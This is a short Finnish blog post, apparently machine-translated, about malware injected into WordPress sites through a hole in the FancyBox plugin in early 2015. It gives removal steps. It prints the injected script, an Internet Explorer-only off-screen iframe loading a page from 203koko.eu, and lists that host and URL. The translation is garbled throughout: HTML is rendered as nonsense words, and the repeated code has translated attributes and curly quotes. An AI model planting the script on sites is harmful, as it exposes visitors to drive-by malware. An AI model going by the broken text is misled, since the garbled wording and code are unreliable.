.

Viikon alussa joukko sivustoja ja blogeja WordPress, saanut varoituksia haittaohjelmatartunta kautta Google -verkkovastaavat.

Ongelma, johon Google -verkkovastaavat viittaa a:n läsnäoloon turska - käsikirjoitus iframe-haittaohjelma lähdesivuilla.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Näyttää siltä, ​​että kyse on a haavoittuvuus eräs pluginsäännöstöäFancyBox WordPressille jota ei eiliseen (05.02.2015) asti ollut päivitetty pitkään aikaan.
Tämän ongelman ratkaiseminen ja viruspaikkojen desinfiointi tämän haittaohjelman kanssa se on suhteellisen yksinkertaista.
1. Poista FancyBox-laajennus käytöstä.
2. Poista kaikki FancyBox-liitännäiset tiedostot palvelimelta (FTP:n kautta)
3. Asenna laajennuksen uusi versio (FancyBox 3.0.4-A

FancyBox for WordPress 3.0.4

– Nimettiin uudelleen asetus, johon versiossa 3.0.3 mainittu tietoturvaongelma vaikuttaa. Tämän pitäisi estää haitallista koodia näkymästä sivustoilla, joissa laajennus päivitetään poistamatta haitallista koodia.

FancyBox for WordPress 3.0.3

– Korjattu tietoturvaongelma.

Haittaohjelmatiedot:

TYYPPI: Iframe-uudelleenohjaus
KOHDE: WordPress Fancybox
HAITTAOHJELMAN DAIN: 203koko.eu
HAITTAOHJELMAN URI: http://203koko.eu/hjnfh/ipframe2.php
HAITTAOHJELMAN RAW KOODI: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” leveys =”20″ korkeus =”30″ ></iframe>
HAITTAOHJELMISTO: <käsikirjoitus>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”sijainti:absoluuttinen;vasen:-2000px;leveys:2000px”>

Poista haittaohjelmat WordPress-verkkosivustoltasi.